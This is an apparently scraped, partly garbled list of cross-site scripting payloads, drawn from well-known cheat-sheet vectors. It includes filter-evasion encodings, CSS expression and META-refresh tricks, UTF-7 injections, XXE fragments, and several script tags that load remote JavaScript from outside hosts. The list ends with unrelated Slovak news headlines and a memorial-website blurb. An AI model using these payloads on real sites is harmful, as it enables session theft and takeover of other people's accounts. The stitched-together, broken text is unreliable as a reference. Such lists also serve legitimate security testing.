confirm(1);
alert(1)
ClickMe
alert(1) </script 1=2
style="x:">
--!>
">
CLICKME
click
Click Me
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
'`">javascript:alert(1)
'`">javascript:alert(1)
\x3Cscript>javascript:alert(1)
'"`>/* *\x2Fjavascript:alert(1)// */
javascript:alert(1)</script\x0D
javascript:alert(1)</script\x0A
javascript:alert(1)</script\x0B
javascript:alert(1)
-->
--> -->
--> -->
--> -->
--> -->
`"'>
test
"'`>a='hello\x27;javascript:alert(1)//';
test
test
test
test
test
test
test
test
test
test
test
test
test
test
/* *\x2A/javascript:alert(1)// */
/* *\x00/javascript:alert(1)// */
"'`>ABCDEF
"'`>ABCDEF
if("x\\xE1\x96\x89". length==2) { javascript:alert(1);}
if("x\\xE0\xB9\x92". length==2) { javascript:alert(1);}
if("x\\xEE\xA9\x93". length==2) { javascript:alert(1);}
'`">javascript:alert(1)
'`">javascript:alert(1)
"'`>
"'`>
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
javascript:alert(1);
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
ABCDEF
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
test
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
"`'>\x3Bjavascript:alert(1)
"`'>\x0Djavascript:alert(1)
"`'>\xEF\xBB\xBFjavascript:alert(1)
"`'>\xE2\x80\x81javascript:alert(1)
"`'>\xE2\x80\x84javascript:alert(1)
"`'>\xE3\x80\x80javascript:alert(1)
"`'>\x09javascript:alert(1)
"`'>\xE2\x80\x89javascript:alert(1)
"`'>\xE2\x80\x85javascript:alert(1)
"`'>\xE2\x80\x88javascript:alert(1)
"`'>\x00javascript:alert(1)
"`'>\xE2\x80\xA8javascript:alert(1)
"`'>\xE2\x80\x8Ajavascript:alert(1)
"`'>\xE1\x9A\x80javascript:alert(1)
"`'>\x0Cjavascript:alert(1)
"`'>\x2Bjavascript:alert(1)
"`'>\xF0\x90\x96\x9Ajavascript:alert(1)
"`'>-javascript:alert(1)
"`'>\x0Ajavascript:alert(1)
"`'>\xE2\x80\xAFjavascript:alert(1)
"`'>\x7Ejavascript:alert(1)
"`'>\xE2\x80\x87javascript:alert(1)
"`'>\xE2\x81\x9Fjavascript:alert(1)
"`'>\xE2\x80\xA9javascript:alert(1)
"`'>\xC2\x85javascript:alert(1)
"`'>\xEF\xBF\xAEjavascript:alert(1)
"`'>\xE2\x80\x83javascript:alert(1)
"`'>\xE2\x80\x8Bjavascript:alert(1)
"`'>\xEF\xBF\xBEjavascript:alert(1)
"`'>\xE2\x80\x80javascript:alert(1)
"`'>\x21javascript:alert(1)
"`'>\xE2\x80\x82javascript:alert(1)
"`'>\xE2\x80\x86javascript:alert(1)
"`'>\xE1\xA0\x8Ejavascript:alert(1)
"`'>\x0Bjavascript:alert(1)
"`'>\x20javascript:alert(1)
"`'>\xC2\xA0javascript:alert(1)
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
"/>
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
javascript:alert(1)
">
">
">
">
">
">
">
">
">
">
">
">
">
">
">
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
`"'>
javascript:alert(1)
<video poster=javascript:javascript:alert(1)//
...............
Clickme clickme
XXX
javascript:alert(1)
alert(1)0
document. getElementById("div2"). innerHTML = document. getElementById("div1"). innerHTML;
javascript:alert(1)">
javascript:alert(1)">
javascript:alert(1)">
javascript:alert(1)'>">
javascript:alert(1)">
javascript:alert(1)">
d. innerHTML=d. innerHTML
XXX
javascript:alert(1)"` `>
">
javascript:alert(1)
-->
p[foo=bar{}*{-o-link:'javascript:javascript:alert(1)'}{}*{-o-link-source:current}]{color:red};
<link rel=stylesheet href=data:,*%7bx:expression(javascript:alert(1))%7d
@import "data:,*%7bx:expression(javascript:alert(1))%7D";
XXXXXX
*[{}@import'%(css)s?]X
XXX
XXX
*{x:expression(javascript:alert(1))}
X with(document. getElementById("d"))innerHTML=innerHTML
XXX #x{font-family:foo[bar;color:green;} #y];color:red;{}
XXX
({set/**/$($){_/**/setter=$,_=javascript:alert(1)}}).$=eval
({0:#0=eval/#0#/#0#(javascript:alert(1))})
ReferenceError. prototype. __defineGetter__('name', function(){javascript:alert(1)}),x
Object. __noSuchMethod__ = Function,[{}][0]. constructor. _('javascript:alert(1)')()
&ADz&AGn&AG0&AEf&ACA&AHM&AHI&AGO&AD0&AGn&ACA&AG8Abg&AGUAcgByAG8AcgA9AGEAbABlAHIAdAAoADEAKQ&ACAAPABi
&alert&A7&(1)&R&UA;&&
¼script¾javascript:alert(1)¼/script¾
XXX
%(payload)s
javascript:alert(1)
%(payload)s//
<IMG SRC="javascript:javascript:alert(1)"
<iframe src=%(scriptlet)s <
@import'%(css)s';
; REL=stylesheet">
li {list-style-image: url("javascript:javascript:alert(1)");}XSS
javascript:alert(1);
. XSS{background-image:url("javascript:javascript:alert(1)");}
BODY{background:url("javascript:javascript:alert(1)")}
javascript:alert(1);
XSS""","XML namespace."),("""<IMG SRC="javascript:javascript:alert(1)">
+ADw-SCRIPT+AD4-%(payload)s;+ADw-/SCRIPT+AD4-
@import'%(css)s';
a{background:url('s1' 's2)}@import javascript:javascript:alert(1);');}
&&javascript:alert(1)&&;&&
javascript:alert(1);
]]
test1
test1
%(payload)s">
">
';alert(String. fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";
alert(String. fromCharCode(88,83,83))//";alert(String. fromCharCode(88,83,83))//--
>">'>alert(String. fromCharCode(88,83,83))
'';!--"=&{()}
xxs link
xxs link
alert("XSS")">
perl -e 'print "";' > out
alert("XSS");//
<IMG SRC="javascript:alert('XSS')"
<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <
\";alert('XSS');//
alert("XSS");
li {list-style-image: url("javascript:alert('XSS')");}XSS
@import'ha.ckers.org/xss.css';
; REL=stylesheet">
BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';
exp/*
alert('XSS');
. XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}
BODY{background:url("javascript:alert('XSS')")}
¼script¾alert(¢XSS¢)¼/script¾
'"-->
alert("XSS")'); ?>
Redirect 302 /a. jpg victimsite.com/admin.asp&deleteuser
alert('XSS')">
+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
" SRC="ha.ckers.org/xss.js">
" SRC="ha.ckers.org/xss.js">
" '' SRC="ha.ckers.org/xss.js">
'" SRC="ha.ckers.org/xss.js">
` SRC="ha.ckers.org/xss.js">
'>" SRC="ha.ckers.org/xss.js">
document. write("PT SRC="ha.ckers.org/xss.js">
XSS
XSS
XSS
XSS
XSS
XSS
{font-family:''
<input/onmouseover="javaSCRIPT:confirm(1)"
alert(1) {Opera}
<img/src=`` onerror=this. onerror=confirm(1)
<isindex formaction="javascript:confirm(1)"
<img src=``
 onerror=alert(1)

prompt(1)</ScRipT giveanswerhere=?
/**/alert(1)/**/</script /**/
">
">
</script
<script x:href='https://<a href="http://dl.dropbox.com/u/13018058/js.js" target="_blank" rel="nofollow">dl.dropbox.com/u/13018058/js.js</a>' {Opera}
X</a
http://<a href="http://www.googlealert" target="_blank" rel="nofollow">www.googlealert</a>(<a href="http://document.location" target="_blank" rel="nofollow">document.location</a>)</script
XYZ</a
<img/src=@  onerror = prompt('1')
<style/onload=prompt('XSS')
alert(String. fromCharCode(49))</script ^__^
/**/alert(document. location)/**/</script   :-(
�
/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/
alert(0%0)
SPAN
<img/src='http://i.<a href="http://imgur.com/P8mL8.jpg" target="_blank" rel="nofollow">imgur.com/P8mL8.jpg</a>' onmouseover=	prompt(1)
">{-o-link-source:''
OnMouseOver {Firefox & Opera}
^__^
X {IE7}
<iframe// src=javaSCRIPT:alert(1)
////
/*iframe/src*/
//|\\ //|\\ </script //|\\
/{src:''/
<plaintext/onmouseover=prompt(1)
''alert(1) {Opera}
DIV
On Mouse Over
Click Here
alert(1);
<iframe/src \/\/onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<iframe/src=javascript:confirm(1)
click
MsgBox+1
">X</a
~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+
</script a=\u0061 & /=%2F
</script
+-+-1-+-+alert(1)
/*<script* */alert(1)</script
<img src ?itworksonchrome?\/onerror = alert(1)
//
confirm(1);
alert(1)
ClickMe
alert(1) </script 1=2
style="x:">
--!>
">
CLICKME
click
Click Me
'';!--"=&{()}
'>//\\,">">"*"
'); alert('XSS
alert(1);
alert('XSS');
alert("XSS")">
ipt>alert('XSS');ipt>
alert(String. fromCharCode(88,83,83))
@im\port'\ja\vasc\ript:alert(\"XSS\")';
alert(\"XSS\")'); ?>
alert('XSS')
">alert(0)
alert(/xss/)
alert(/xss/)
alert('XSS')
<body onLoad="alert('XSS');"
[color=red' onmouseover="alert('xss')"]mouse over[/color]
"/>
window. alert("Bonjour !");
<div style="x:expression((window. r==1)?'':eval('r=1;
alert(String. fromCharCode(88,83,83));'))">
onload=alert('XSS')>
">
'>>XSS
'">>alert('XSS')
'">>XSS
var var = 1; alert(var)
BODY{background:url("javascript:alert('XSS')")}
alert("XSS")'?>
" onfocus=alert(document. domain) "> <"
li {list-style-image: url(\"javascript:alert('XSS')\");}XSS
perl -e 'print \"alert(\"XSS\")\";' > out
perl -e 'print \"\";' > out
alert(1)
alert(1)
">
[color=red width=expression(alert(123))][color]
Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
">alert(123)
'">alert(1111)
'">alert(document. cookie)
'""> alert('X \nS \nS');
>>>alert(123)
(123)(123)
'>alert(123)
'>">
}a=eval;b=alert;a(b(/XSS/. source));
document. write("XSS");
a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
='>alert("xss")
"+src="yoursite.com/xss.js?69,69">
alert(navigator. userAgent)>
">/XaDoS/>alert(document. cookie)
">/KinG-InFeT. NeT/>alert(document. cookie)
src="www.site.com/XSS.js">
data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
!--" />alert('xss');
alert("XSS by \nxss")XSS by xss
">alert("XSS by \nxss")>XSS by xss
'">alert("XSS by \nxss")>XSS by xss
alert("XSS by \nxss")XSS by xss
alert(1337)XSS by xss
">alert(1337)">alert("XSS by \nxss
'">alert(1337)>XSS by xss
XSS by xss
'>alert(String. fromCharCode(88,83,83))<img src="" alt='
">alert(String. fromCharCode(88,83,83))<img src="" alt="
\'>alert(String. fromCharCode(88,83,83))<img src="" alt=\'
http://www.simpatie.ro/index.php?page=friends&member=781339&javafunctionname=Pageclick&javapgno=2 javapgno=2 ??XSS??
http://www.simpatie.ro/index.php?page=top_movies&cat=13&p=2 p=2 ??XSS??
'); alert('xss'); var x='
\\'); alert(\'xss\');var x=\'
//-->alert(String. fromCharCode(88,83,83));
>">alert(561177485777)%3B
alert(“XSS”);
';alert(String. fromCharCode(88,83,83))//\';alert(String. fromCharCode(88,83,83))//";alert(String. fromCharCode(88,83,83))//\";alert(String. fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String. fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
<SCRIPT>alert('XSS')</SCRIPT>
<SCRIPT SRC=ha.ckers.org/xss.js></SCRIPT>
<SCRIPT>alert(String. fromCharCode(88,83,83))</SCRIPT>
<BASE HREF="javascript:alert('XSS');//">
<BGSOUND SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS');">
<BODY ONLOAD=alert('XSS')>
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG DYNSRC="javascript:alert('XSS');">
<IMG LOWSRC="javascript:alert('XSS');">
<IMG SRC="www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
Redirect 302 /a. jpg victimsite.com/admin.asp&deleteuser
exp/*<XSS STYLE='no\xss:noxss("*//*");
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
<IMG SRC='vbscript:msgbox("XSS")'>
<LAYER SRC="ha.ckers.org/scriptlet.html"></LAYER>
<IMG SRC="livescript:[code]">
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IMG SRC="mocha:[code]">
<OBJECT TYPE="text/x-scriptlet" DATA="ha.ckers.org/scriptlet.html"></OBJECT>
<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
<EMBED SRC="ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")"; eval(a+b+c+d);
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
<XSS STYLE="xss:expression(alert('XSS'))">
<STYLE>. XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="ha.ckers.org/xss.css">
<STYLE>@import'ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
<HTML xmlns:xss>
<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>
<XML SRC="ha.ckers.org/xsstest.xml" ID=I></XML>
<HTML><BODY>
<!--[if gte IE 4]>
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<XSS STYLE="behavior: url(ha.ckers.org/xss.htc);">
<SCRIPT SRC="ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
<BR SIZE="&{alert('XSS')}">
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert(&quot;XSS&quot;)>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG SRC=javascript:alert(String. fromCharCode(88,83,83))>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028. 1027\0058. 1053\0053\0027\0029'\0029">
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
\";alert('XSS');//
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG SRC="jav	ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG
SRC
=
"
j
a
v
a
s
c
r
i
p
t
:
a
l
e
r
t
(
'
X
S
S
'
)
"
>
perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT SRC=ha.ckers.org/xss.js
<SCRIPT SRC=//ha. ckers. org/. j>
<IMG SRC="javascript:alert('XSS')"
<IFRAME SRC=ha.ckers.org/scriptlet.html <
<<SCRIPT>alert("XSS");//<</SCRIPT>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<SCRIPT>a=/XSS/
<SCRIPT a=">" SRC="ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT ="blah" SRC="ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a="blah" '' SRC="ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document. write("<SCRI");</SCRIPT>PT SRC="ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="h
tt	p://6&#09;6. 000146. 0x7. 147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="google.com/">XSS</A>
<A HREF="www.google.com./">XSS</A>
<A HREF="javascript:document. location='www.google.com/'">XSS</A>
<A HREF="www.gohttp://www.google.com/ogle.com/">XSS</A>
document. vulnerable=true;
document. vulnerable=true;//
document. vulnerable=true;
<img SRC="javascript:document. vulnerable=true;"
<iframe src="javascript:document. vulnerable=true; <
a=/XSS/\ndocument. vulnerable=true;
\";document. vulnerable=true;;//
document. vulnerable=true;
li {list-style-image: url("javascript:document. vulnerable=true;");XSS
1script3document. vulnerable=true;1/script3
@im\port'\ja\vasc\ript:document. vulnerable=true';
exp/*
document. vulnerable=true;
. XSS{background-image:url("javascript:document. vulnerable=true");}
BODY{background:url("javascript:document. vulnerable=true")}
document. vulnerable=true;
]]
cript:document. vulnerable=true">
document. vulnerable=true">
document. vulnerable=true'); ?>
document. vulnerable=true">
+ADw-SCRIPT+AD4-document. vulnerable=true;+ADw-/SCRIPT+AD4-
&document. vulnerable=true;
&{document. vulnerable=true;};
document. vulnerable=true;">
document. vulnerable=true;
document. vulnerable=true;//-->
document. vulnerable=true;
document. vulnerable=true;//-->
document. vulnerable=true;
" onmouseover="document. vulnerable=true;">
document. vulnerable=true;;
[\xC0][\xBC]script>document. vulnerable=true;[\xC0][\xBC]/script>
@import'www.securitycompass.com/xss.css';
; REL=stylesheet">
BODY{-moz-binding:url("www.securitycompass.com/xssmoz.xml#xss")}
XSS
'"-->
" SRC="www.securitycompass.com/xss.js">
" SRC="www.securitycompass.com/xss.js">
" '' SRC="www.securitycompass.com/xss.js">
'" SRC="www.securitycompass.com/xss.js">
` SRC="www.securitycompass.com/xss.js">
'>" SRC="www.securitycompass.com/xss.js">
document. write("PT SRC="www.securitycompass.com/xss.js">
[Mozilla]
"><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
</script><script>alert(1)</script>
</br style=a:expression(alert())>
<scrscriptipt>alert(1)</scrscriptipt>
<br size=\"&{alert('XSS')}\">
perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
">alert('XSS')
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
';;alert(String. fromCharCode(88,83,83))//\';;alert(String. fromCharCode(88,83,83))//";;alert(String. fromCharCode(88,83,83))//\";;alert(String. fromCharCode(88,83,83))//-->;;";>;';>;;alert(String. fromCharCode(88,83,83));
';';;!--";;=&;{()}
;alert(';XSS';);
;;
;alert(String. fromCharCode(88,83,83));
;;;
;;
Redirect 302 /a. jpg victimsite.com/admin.asp&;deleteuser
exp/*<;XSS STYLE=';no\xss:noxss(";*//*";);
;li {list-style-image: url(";javascript:alert('XSS')";);};;;XSS
;;
%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
;;
;;;
;;
a=";get";;&;#10;b=";URL(";";;&;#10;c=";javascript:";;&;#10;d=";alert(';XSS';);";)";; eval(a+b+c+d);
;alert(';XSS';);;
;. XSS{background-image:url(";javascript:alert(';XSS';)";);};;;
;BODY{background:url(";javascript:alert(';XSS';)";)};
;@import';ha.ckers.org/xss.css';;;
;; REL=stylesheet";>;
;BODY{-moz-binding:url(";ha.ckers.org/xssmoz.xml#xss";)};
;;
;;;;
;;;;;]]>;
;;;;cript:alert(';XSS';)";>;;;;
;;
;;
;alert(';XSS';);";>;
;;
;;;';";-->;
<;? echo(';<;SCR)';;
;; ;+ADw-SCRIPT+AD4-alert(';XSS';);+ADw-/SCRIPT+AD4-
\";;alert(';XSS';);//
;;alert("XSS");;
;@im\port';\ja\vasc\ript:alert(";XSS";)';;;
;
perl -e ';print ";";;';>; out
perl -e ';print ";&;;alert(";XSS";);";;'; >; out
;;
<;SCRIPT SRC=<a href="http://ha.ckers.org/xss.js" target="_blank" rel="nofollow">ha.ckers.org/xss.js</a>
<;IMG SRC=";javascript:alert(';XSS';)";
<;IFRAME SRC=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <;
;alert(";XSS";);//;
;;alert(";XSS";);";>;
;a=/XSS/
;"; SRC=";ha.ckers.org/xss.js";>;;
;;
;;
;';"; SRC=";ha.ckers.org/xss.js";>;;
;` SRC=";ha.ckers.org/xss.js";>;;
;document. write(";;PT SRC=";ha.ckers.org/xss.js";>;;
';>"; SRC=";ha.ckers.org/xss.js";>;;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
;XSS;
document. vulnerable=true;
document. vulnerable=true;//
document. vulnerable=true;
<img SRC="javascript:document. vulnerable=true;"
<iframe src="javascript:document. vulnerable=true; <
a=/XSS/\ndocument. vulnerable=true;
\";document. vulnerable=true;;//
document. vulnerable=true;
li {list-style-image: url("javascript:document. vulnerable=true;");XSS
1script3document. vulnerable=true;1/script3
@im\port'\ja\vasc\ript:document. vulnerable=true';
exp/*
document. vulnerable=true;
. XSS{background-image:url("javascript:document. vulnerable=true");}
BODY{background:url("javascript:document. vulnerable=true")}
document. vulnerable=true;
]]
cript:document. vulnerable=true">
document. vulnerable=true">
document. vulnerable=true'); ?>
document. vulnerable=true">
+ADw-SCRIPT+AD4-document. vulnerable=true;+ADw-/SCRIPT+AD4-
&document. vulnerable=true;
&{document. vulnerable=true;};
document. vulnerable=true;">
document. vulnerable=true;
document. vulnerable=true;//-->
document. vulnerable=true;
document. vulnerable=true;//-->
document. vulnerable=true;
" onmouseover="document. vulnerable=true;">
document. vulnerable=true;;
[\xC0][\xBC]script>document. vulnerable=true;[\xC0][\xBC]/script>
@import'www.securitycompass.com/xss.css';
; REL=stylesheet">
BODY{-moz-binding:url("www.securitycompass.com/xssmoz.xml#xss")}
XSS
'"-->
" SRC="www.securitycompass.com/xss.js">
" SRC="www.securitycompass.com/xss.js">
" '' SRC="www.securitycompass.com/xss.js">
'" SRC="www.securitycompass.com/xss.js">
` SRC="www.securitycompass.com/xss.js">
'>" SRC="www.securitycompass.com/xss.js">
document. write("PT SRC="www.securitycompass.com/xss.js">
[Mozilla]
";>;;
;;alert(1);
;alert(1);
perl -e 'print \";;\";;' >; out
perl -e 'print \";;alert(\";XSS\";);\";;' >; out
">alert('XSS')
XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>
XSS STYLE=xss:e/**/xpression(alert('XSS'))>
>">alert("XSS")&
">@import"javascript:alert('XSS')";
>"'>
>%22%27>
'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e'
'';!--"=&{()}
")>
#115;cript:alert('XSS')>
#0000118ascript:alert('XSS')>
#x63ript:alert('XSS')>
'XSS');">
'XSS');">
var n=0;while(true){n++;}]]>
SCRIPT]]>alert('gotcha');/SCRIPT]]>
]>&xee;
]>&xee;
]>&xee;
]>&xee;
alert('XSS')
%3cscript%3ealert('XSS')%3c/script%3e
%22%3e%3cscript%3ealert('XSS')%3c/script%3e
alert("XSS")">
<IMG SRC="javascript:alert('XSS')"
<iframe src=<a href="http://ha.ckers.org/scriptlet.html" target="_blank" rel="nofollow">ha.ckers.org/scriptlet.html</a> <
alert("XSS");//
%253cscript%253ealert(1)%253c/script%253e
">alert(document. cookie)
fooalert(1)
ipt>alert(1)ipt>
Pokuta 3000 EUR za filmovanie úradníkov
Martin Daňo v Show Jána Krausa
Ing. Branislav Kušík - utajený v GORILE
Every Memorial Website celebrates the legacy of a life. Many people choose to share their Memorial Websites in Sysoon’s Featured Memorial Website Program.